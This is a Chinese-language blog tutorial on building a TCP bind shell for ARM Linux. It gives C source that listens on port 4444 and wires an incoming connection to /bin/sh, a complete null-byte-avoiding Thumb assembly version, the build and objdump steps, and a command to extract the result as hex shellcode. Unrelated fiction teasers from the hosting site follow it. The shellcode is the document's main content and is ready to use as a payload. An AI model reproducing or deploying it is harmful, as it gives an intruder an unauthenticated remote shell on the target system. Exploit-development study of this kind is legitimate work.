ARM汇编之TCP Bind Shell

bind shell

作为一个bind shell,也就是在服务器上运行的shellcode,等待hacker去主动连接,所以它的主要工作就是监听固定端口,等待外部连接即可

C代码(Linux,都是使用man命令查询的命令介绍)

指令 介绍
socket int socket(int domain, int type, int protocol);创建通信端点并返回描述符
bind int bind(int sockfd, const struct sockaddr *addr,socklen_t addrlen);由socket创建的套接字只存在命名空间,并没有分配地址,所以由bind来分配实际地址给套接字
listen int listen(int sockfd, int backlog);将sockfd引用的套接字标记成被动的套接字,开启监听状态,等待网络连接的连入
accept int accept(int sockfd, struct sockaddr *addr, socklen_t *addrlen);获取监听套接字上等待连接队列的第一个连接请求,如果成功,则返回这个接受的套接字描述符

dup2和stdin的使用,从dup2(fd, 0);开始,把标准输入的描述符的位置改成了1.txt的文件的描述符,也就是scanf从命令行的标准输入流读入内容,强行改成了从文件1.txt读入内容

int main()
{
        int fd = open("1.txt",O_RDWR);
        char buff[10];
        dup2(fd, 0);
        scanf("%s", buff);
        printf("\nThe content you input is : %s", buff);
        return 0;
}

dup2和execve:下面的代码,首先将输入、输出全部改成了1.txt文件的标识符,所以下面execve执行了sh命令后,从1.txt文件中读取输入、并且将结果返回给1.txt。当然如果想输出到命令行上,可以注释掉dup2(fd,1);这句标准输出流的标识符的更改

int main()
{

        int fd = open("1.txt",O_RDWR);
        char buff[10];
        dup2(fd, 0);
        dup2(fd,1);
        execve("/bin/sh", NULL, NULL);
        printf("\nThe content you input is : %s", buff);
        return 0;
}

最终的bind shell的C代码

#include <sys/socket.h>
#include <stdio.h>
#include <sys/types.h>
#include <netinet/in.h>

int fd_socket;
struct sockaddr_in hostaddr;

int main()
{
        //create a TCP socket
        fd_socket = socket(AF_INET, SOCK_STREAM, 0);

        //绑定本地地址,这里使用的IPv4协议,所以使用sockaddr_in结构体,具体man 7 ip查询
        hostaddr.sin_family = AF_INET;
        hostaddr.sin_port = htons(4444);
        hostaddr.sin_addr.s_addr = htonl(INADDR_ANY);
        bind(fd_socket, (struct sockaddr*)&hostaddr, sizeof(hostaddr));

        //将这个socket转成监听状态,等待socket连接过来
        listen(fd_socket, 2);

        //获取并建立连接和连接过来的socket队列中的第一个连接,这是单对单的socket
        //不指定特定ip地址端口的客户端socket,所以后面两个参数为null
        int fd_client = accept(fd_socket, NULL, NULL);

        //将输入、输出、错误流都导向accept建立好的socket标识符
        dup2(fd_client, 0);
        dup2(fd_client, 1);
        dup2(fd_client, 2);

        //获取输入缓冲区数据并输出到标准输出标识符中去
        execve("/bin/sh", NULL, NULL);
        close(fd_socket);

        return 0;
}

汇编bind shell过程

根据C代码获取关键函数的系统调用号参数

grep -R "socket" /usr/include/arm-linux-gnueabihf/asm/
找到的结果,很明显我们需要第二个:
/usr/include/arm-linux-gnueabihf/asm/unistd.h:#define __NR_socketcall       (__NR_SYSCALL_BASE+102)
/usr/include/arm-linux-gnueabihf/asm/unistd.h:#define __NR_socket       (__NR_SYSCALL_BASE+281)
/usr/include/arm-linux-gnueabihf/asm/unistd.h:#define __NR_socketpair       (__NR_SYSCALL_BASE+288)
/usr/include/arm-linux-gnueabihf/asm/unistd.h:#undef __NR_socketcall
/usr/include/arm-linux-gnueabihf/asm/socket.h:#include <asm-generic/socket.h>

grep -R "bind" /usr/include/arm-linux-gnueabihf/asm/
/usr/include/arm-linux-gnueabihf/asm/unistd.h:#define __NR_bind         (__NR_SYSCALL_BASE+282)
/usr/include/arm-linux-gnueabihf/asm/unistd.h:#define __NR_mbind        (__NR_SYSCALL_BASE+319)

grep -R "listen" /usr/include/arm-linux-gnueabihf/asm/
/usr/include/arm-linux-gnueabihf/asm/unistd.h:#define __NR_listen       (__NR_SYSCALL_BASE+284)

grep -R "accept" /usr/include/arm-linux-gnueabihf/asm/
/usr/include/arm-linux-gnueabihf/asm/unistd.h:#define __NR_accept       (__NR_SYSCALL_BASE+285)
/usr/include/arm-linux-gnueabihf/asm/unistd.h:#define __NR_accept4      (__NR_SYSCALL_BASE+366)

从上面提取到我们需要的系统函数的调用号,还需要一步就是基地址地址__NR_SYSCALL_BASEgrep -R "__NR_SYSCALL_BASE" /usr/include/arm-linux-gnueabihf/asm/查询的值是:/usr/include/arm-linux-gnueabihf/asm/unistd.h:#define __NR_SYSCALL_BASE 0
/usr/include/arm-linux-gnueabihf/asm/unistd.h:#define __NR_socket (__NR_SYSCALL_BASE+281)
/usr/include/arm-linux-gnueabihf/asm/unistd.h:#define __NR_bind (__NR_SYSCALL_BASE+282)
/usr/include/arm-linux-gnueabihf/asm/unistd.h:#define __NR_listen (__NR_SYSCALL_BASE+284)
/usr/include/arm-linux-gnueabihf/asm/unistd.h:#define __NR_accept (__NR_SYSCALL_BASE+285)
参数查询:通过man命令

首先需要解决空字节的出现问题,我么采用thumb指令集来尽量避免

.global _start
_start:
        .code 32
        //switch to thumb
        add r3, pc, #1
        bx r3

然后开始第一条语句的汇编代码fd_socket = socket(AF_INET, SOCK_STREAM, 0);:先找到的需要的参数值,然后找到存放参数的寄存器。
首先通过下面的查询命令获取参数的值(第三个参数使用man socket看参数简介时,提醒你看protocols来,man 5 protocols进入man页面,介绍说在/etc/protocols文件里就可以看到所有种类协议的协议标号,这里根据socket的page页介绍,只使用一个协议,所以使用0,伪协议即可),下面是其他两个参数的查询过程
grep -R "AF_INET" /usr/include

/usr/include/arm-linux-gnueabihf/bits/socket.h:#define  AF_INET     PF_INET

然后grep -R "AF_INET\|PF_INET\|SOCK_STREAM" /usr/include

/usr/include/arm-linux-gnueabihf/bits/socket.h:#define  PF_INET     2   /* IP protocol family.  */
/usr/include/arm-linux-gnueabihf/bits/socket_type.h:  SOCK_STREAM = 1,      /* Sequenced, reliable, connection-based

这里还要引入合法立即数的概念:最终合法可用的立即数是任意8(<=255)立即数经过循环右移任意24(<=30),为什么要乘以2*,要保证8位立即数可以在32位地址上移动。最终合法立即数区间:[0,FF00 00000],这是带符号立即数,最高位标识正负

ARM指令集的合法立即数

arm指令集合法立即数判断脚本-github
v = n ror 2*r
v:合法、可以使用的立即数
n:8bit的立即数
r:4bit的循环右移操作数

THUMB指令集的合法立即数

0-255

根据引入的知识点,来确定系统调用号的选取([arm指令集合法立即数判断脚本-github],注意THUMB指令集合法立即数0-255(https://github.com/xiongchaochao/repository/blob/master/Tools/LegalImmediate.py))

c:\Users\xxxxx\Downloads>python LegalNumber.py 281
illegal immediate: 281

c:\Users\xiongchaochao\Downloads>python LegalNumber.py 255
Legal Immediate: 255
[+]255 >> 0

c:\Users\xiongchaochao\Downloads>python LegalNumber.py 26
Legal Immediate: 26
[+]26 >> 0

问题代码,出现报错bind_shell.s: Assembler messages: bind_shell.s:20: Error: immediate value out of range经过查询修改发现,是应为THUMB指令集的原因,THUMB指令集下:
ADD Rd,Rn,#expr3或者ADD Rd,#expr8
expr3 3 位立即数,即0~7。
expr8 8 位立即数,即0~255。
arm各种详细指令文档

  4 .global _start
  5 
  6 _start:
  7         mov r1, #2147483648
  8         .code 32
  9         //switch to thumb
 10         add r3, pc, #1
 11         bx r3
 12 
 13 
 14         .code 16
 15         //create a socket,先写入参数,然后svc系统调用
 16         mov r0, #2
 17         mov r1, #1
 18         mov r2, #0
 19         mov r3, #255
 20         add r7, r3, #26
 21         svc #1
 22         mov r4, r0

修改后的代码:

.global _start

_start:
        mov r1, #2147483648
        .code 32
        //switch to thumb
        add r3, pc, #1
        bx r3


        .code 16
        //create a socket
        mov r0, #2
        mov r1, #1
        mov r2, #0
        mov r7, #255
        add r7, #26
        svc #1
        mov r4, r0

现在开始下一句主要是bind(fd_socket, (struct sockaddr*)&hostaddr, sizeof(hostaddr));,前面几句参数的赋值操作。在使用man bind后,其他两个参数都还好理解并选择给定的参数赋值既可,但是第二个参数const struct sockaddr *addr,这个结构体初次看见不太理解,他会让你去看下面的例子,大致能知道他是让你填写ip地址段口号之类,下面我们来追踪下这个结构体,看具体怎么来赋值使用

struct sockaddr {
sa_family_t sa_family;
char sa_data[14];
}

从man bind页可以知道它主要来源于#include <sys/socket.h>,所以find /usr -name "socket.h",可以找到sys路径下只有一个文件位置/usr/include/arm-linux-gnueabihf/sys/socket.h,这里的内容我是选择在线看的,内容一致,并且可以很方便的查询函数的声明和实例。在这里可以找到bind的代码

/* Give the socket FD the local address ADDR (which is LEN bytes long).  */
extern int bind (int __fd, __CONST_SOCKADDR_ARG __addr, socklen_t __len)
     __THROW;

这里将const struct sockaddr *结构体指针进行了宏定义,看代码作者怎么说的:GCC2.7以后,可以使用下面列表类型中的任意一个,而不会出问题。但是GCC2.7不支持透明联合,所以也需要旧版的声明。
bind函数主要用到下面的__CONST_SOCKADDR_ARG,也就是被声明成了透明联合体,可以使用__SOCKADDR_ALLTYPES内的任意类型结构体。

/* This is the type we use for generic socket address arguments.
   With GCC 2.7 and later, the funky union causes redeclarations or
   uses with any of the listed types to be allowed without complaint.
   G++ 2.7 does not support transparent unions so there we want the
   old-style declaration, too.  */
#if defined __cplusplus || !__GNUC_PREREQ (2, 7) || !defined __USE_GNU
//上面条件语句:__GNUC_PREREQ --如果GCC版本不是2.7或者之后的就执行下面的宏定义
# define __SOCKADDR_ARG                struct sockaddr *__restrict
# define __CONST_SOCKADDR_ARG        const struct sockaddr *
//根据上面的条件分析,那么下面的宏定义实现的条件就是GCC版本是2.7及其之后的,执行
#else
/* Add more `struct sockaddr_AF' types here as necessary.
   These are all the ones I found on NetBSD and Linux.  */
# define __SOCKADDR_ALLTYPES \
  __SOCKADDR_ONETYPE (sockaddr) \
  __SOCKADDR_ONETYPE (sockaddr_at) \
  __SOCKADDR_ONETYPE (sockaddr_ax25) \
  __SOCKADDR_ONETYPE (sockaddr_dl) \
  __SOCKADDR_ONETYPE (sockaddr_eon) \
  __SOCKADDR_ONETYPE (sockaddr_in) \
  __SOCKADDR_ONETYPE (sockaddr_in6) \
  __SOCKADDR_ONETYPE (sockaddr_inarp) \
  __SOCKADDR_ONETYPE (sockaddr_ipx) \
  __SOCKADDR_ONETYPE (sockaddr_iso) \
  __SOCKADDR_ONETYPE (sockaddr_ns) \
  __SOCKADDR_ONETYPE (sockaddr_un) \
  __SOCKADDR_ONETYPE (sockaddr_x25)
# define __SOCKADDR_ONETYPE(type) struct type *__restrict __##type##__;
typedef union { __SOCKADDR_ALLTYPES
              } __SOCKADDR_ARG __attribute__ ((__transparent_union__));
# undef __SOCKADDR_ONETYPE
//将上面列出的结构体,生成对应的const struct type *__restrict __##type##__;类型的结构体,type传入参数改变
# define __SOCKADDR_ONETYPE(type) const struct type *__restrict __##type##__;
//bind 函数。中的结构体主要是用到了这里的__CONST_SOCKADDR_ARG 
typedef union { __SOCKADDR_ALLTYPES
              } __CONST_SOCKADDR_ARG __attribute__ ((__transparent_union__));
# undef __SOCKADDR_ONETYPE
#endif

查询(grep -R "sockaddr_in {" /usr/include )上面列出的的结构体,最用可以确定sockaddr_in,查到/usr/include/linux/in.h这个文件,就查到了具体需要赋值的结构体的具体位置 。我们可以根据grep -R "__SOCKADDR_COMMON " /usr/include这个命令找到__SOCKADDR_COMMON 具体定义的地方,会知道这个变量的具体分配的字节数,在介绍结尾它提示/* bits/sockaddr.h */,我们找到这个文件内,我们可以找到这个变量,并且看到它具体存储的是socket地址的地址族信息,并且这个文件内部就有很多地址族的很多声明

struct sockaddr_in
  {
    __SOCKADDR_COMMON (sin_);        /* 2字节*/
    in_port_t sin_port;                        /* Port number.  2字节*/
    struct in_addr sin_addr;                /* Internet address.  4字节*/
/*寻找指令:grep -R "__u32" /usr/include | grep "typedef"*/
    /* Pad to size of `struct sockaddr'.  填充到结构体sockaddr的大小。 16-2-2-4=8字节,也就是说通用结构体sockaddr长度16,
上面用到了8字节具体数据,剩余需要填充的空间大小8字节*/
    unsigned char sin_zero[sizeof (struct sockaddr) -
                           __SOCKADDR_COMMON_SIZE -
                           sizeof (in_port_t) -
                           sizeof (struct in_addr)];
  };

准备工作基本完成,下面是完整的bind本地地址的汇编代码。需要注意的是为了尽量避免空字节,先把地址0.0.0.0改成1.1.1.1,执行时使用strb修改回来。还有就是最后一个nop指令是为了所有指令对齐。还有就是bind的第三个参数,sockaddr结构体的长度是固定值16,可以通过查看这个结构体声明代码处的类型,来判断大小

 24         //bind local address
 25      
 26         adr r1, local_addr
 27         strb r2, [r1, #1]
 28         strb r2, [r1, #4]
 29         strb r2, [r1, #5]
 30         strb r2, [r1, #6]
 31         strb r2, [r1, #7]
 32         mov r2, #16
 33         add r7, #1
 34         svc #1
 35         nop
 36 
 37 
 38 local_addr:
 39 .ascii "\x02\xff"
 40 .ascii "\x11\x5c"
 41 .byte 1,1,1,1

下面是listen:本地socket进入监听状态,等待远程socket连接过来
accept:从连过来的队列中选取第一个连接请求,根据这个请求创建一个新的socket用于双方通信,并返回这个通信通道socket的描述符

        //start listen
        //listen(sockfd, max_number_socket_connect)
        mov r0, r4
        mov r1, #3
        add r7, #2
        svc #1


        //accept(sockfd, *addr, *addrlen)
        mov r0, r4
        sub r1, r1, r1
        sub r2, r2, r2
        add r7, #1
        svc #1
        //socket channel
        mov r4, r0

最后一步,我们将标准输入流描述符标准输出流描述符标准报错流描述符,都导向这个socket描述符,再配合执行执行/bin/sh,这个sh指令会根据标准输入流描述符读取数据并执行,然后将输出、报错数据都输出到标准输出流的描述符、标准报错流的描述符,这样就可以从socket通道传输指令执行然后返回执行结果了。可以使用grep -R "STDERR" /usr/include | grep "define"来查看这三个标识符的值

        //dup2(newfd, oldfd)
        mov r0, r4
        sub r1, r1, r1
        mov r7, #63
        svc #1

        mov r0, r4
        mov r1, #1
        svc #1

        mov r0, r4
        mov r1, #2
        svc #1


        //execve--11
        adr r0, shell_command
        eor r1, r1, r1
        sub r2, r2, r2
        strb r1, [r0, #7]
        mov r7, #11
        svc #1
        nop

local_addr:
.ascii "\x02\xff"
.ascii "\x11\x5c"
.byte 1,1,1,1

shell_command:
.ascii "/bin/shX"

最终代码


.section .text

.global _start

_start:
    .code 32
    //switch to thumb
    add r3, pc, #1
    bx r3

    
    .code 16
    //create a socket
    mov r0, #2
    mov r1, #1
    sub r2, r2, r2
    mov r7, #200
    add r7, #81
    svc #1
    mov r4, r0


    //bind local address
    adr r1, local_addr
    strb r2, [r1, #1]
    strb r2, [r1, #4]
    strb r2, [r1, #5]
    strb r2, [r1, #6]
    strb r2, [r1, #7]
    mov r2, #16
    add r7, #1
    svc #1
    nop

    
    //start listen
    //listen(sockfd, max_number_socket_connect)
    mov r0, r4
    mov r1, #3
    add r7, #2
    svc #1
    
    
    //accept(sockfd, *addr, *addrlen)
    mov r0, r4
    sub r1, r1, r1
    sub r2, r2, r2
    add r7, #1
    svc #1
    mov r4, r0

    
    //dup2(newfd, oldfd)
    mov r0, r4
    sub r1, r1, r1
    mov r7, #63
    svc #1

    mov r0, r4
    mov r1, #1
    svc #1

    mov r0, r4
    mov r1, #2
    svc #1

    
    //execve--11
    adr r0, shell_command
    eor r1, r1, r1
    sub r2, r2, r2
    strb r1, [r0, #7]
    mov r7, #11
    svc #1
    nop

local_addr:
.ascii "\x02\xff"
.ascii "\x11\x5c"
.byte 1,1,1,1

shell_command:
.ascii "/bin/shX"

编译汇编代码as bind_shell.s -o bind_shell.o && ld -N bind_shell.o -o bind_shell(务必加上-N参数,否则部分内存会是只读,但是代码中有strb写内存操作,会导致编译失败)
检查代码中是否存在空字符objdump -d bind_shell.o(看第二列的指令即可)


bind_shell.o:     file format elf32-littlearm


Disassembly of section .text:

00000000 <_start>:
   0:   e28f3001    add r3, pc, #1
   4:   e12fff13    bx  r3
   8:   2002        movs    r0, #2
   a:   2101        movs    r1, #1
   c:   1a92        subs    r2, r2, r2
   e:   27c8        movs    r7, #200    ; 0xc8
  10:   3751        adds    r7, #81 ; 0x51
  12:   df01        svc 1
  14:   1c04        adds    r4, r0, #0
  16:   a112        add r1, pc, #72 ; (adr r1, 60 <local_addr>)
  18:   704a        strb    r2, [r1, #1]
  1a:   710a        strb    r2, [r1, #4]
  1c:   714a        strb    r2, [r1, #5]
  1e:   718a        strb    r2, [r1, #6]
  20:   71ca        strb    r2, [r1, #7]
  22:   2210        movs    r2, #16
  24:   3701        adds    r7, #1
  26:   df01        svc 1
  28:   46c0        nop         ; (mov r8, r8)
  2a:   1c20        adds    r0, r4, #0
  2c:   2103        movs    r1, #3
  2e:   3702        adds    r7, #2
  30:   df01        svc 1
  32:   1c20        adds    r0, r4, #0
  34:   1a49        subs    r1, r1, r1
  36:   1a92        subs    r2, r2, r2
  38:   3701        adds    r7, #1
  3a:   df01        svc 1
  3c:   1c04        adds    r4, r0, #0
  3e:   1c20        adds    r0, r4, #0
  40:   1a49        subs    r1, r1, r1
  42:   273f        movs    r7, #63 ; 0x3f
  44:   df01        svc 1
  46:   1c20        adds    r0, r4, #0
  48:   2101        movs    r1, #1
  4a:   df01        svc 1
  4c:   1c20        adds    r0, r4, #0
  4e:   2102        movs    r1, #2
  50:   df01        svc 1
  52:   a005        add r0, pc, #20 ; (adr r0, 68 <shell_command>)
  54:   4049        eors    r1, r1
  56:   1a92        subs    r2, r2, r2
  58:   71c1        strb    r1, [r0, #7]
  5a:   270b        movs    r7, #11
  5c:   df01        svc 1
  5e:   46c0        nop         ; (mov r8, r8)

00000060 <local_addr>:
  60:   5c11ff02    .word   0x5c11ff02
  64:   01010101    .word   0x01010101

00000068 <shell_command>:
  68:   6e69622f    .word   0x6e69622f
  6c:   5868732f    .word   0x5868732f

将ELF格式可执行文件转换成二进制文件: objcopy -O binary bind_shell bind_shell.bin

格式转换对比

提取十六进制shellcodehexdump -v -e '"\\""x" /1 "%02x" ""' bind_shell.bin
详细命令可以man hexdump,也可以看附录参考文章中的中文版详解

参考文章:

dup与dup2函数详解
I/O重定向的原理和实现: dup、stdin、stdout
Browse the source code of Qt | GLibc | LLVM | Boost | GCC | Linux
msdn上面相关函数的api介绍,socket、bind、listen等
MSDN上的数据类型相关介绍:比如多少字节数
中文版的hexdump指令详解(http://man.linuxde.net/hexdump)

最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
  • 序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 206,723评论 6 481
  • 序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 88,485评论 2 382
  • 文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 152,998评论 0 344
  • 文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 55,323评论 1 279
  • 正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 64,355评论 5 374
  • 文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 49,079评论 1 285
  • 那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 38,389评论 3 400
  • 文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 37,019评论 0 259
  • 序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 43,519评论 1 300
  • 正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 35,971评论 2 325
  • 正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 38,100评论 1 333
  • 序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 33,738评论 4 324
  • 正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 39,293评论 3 307
  • 文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 30,289评论 0 19
  • 文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 31,517评论 1 262
  • 我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 45,547评论 2 354
  • 正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 42,834评论 2 345

推荐阅读更多精彩内容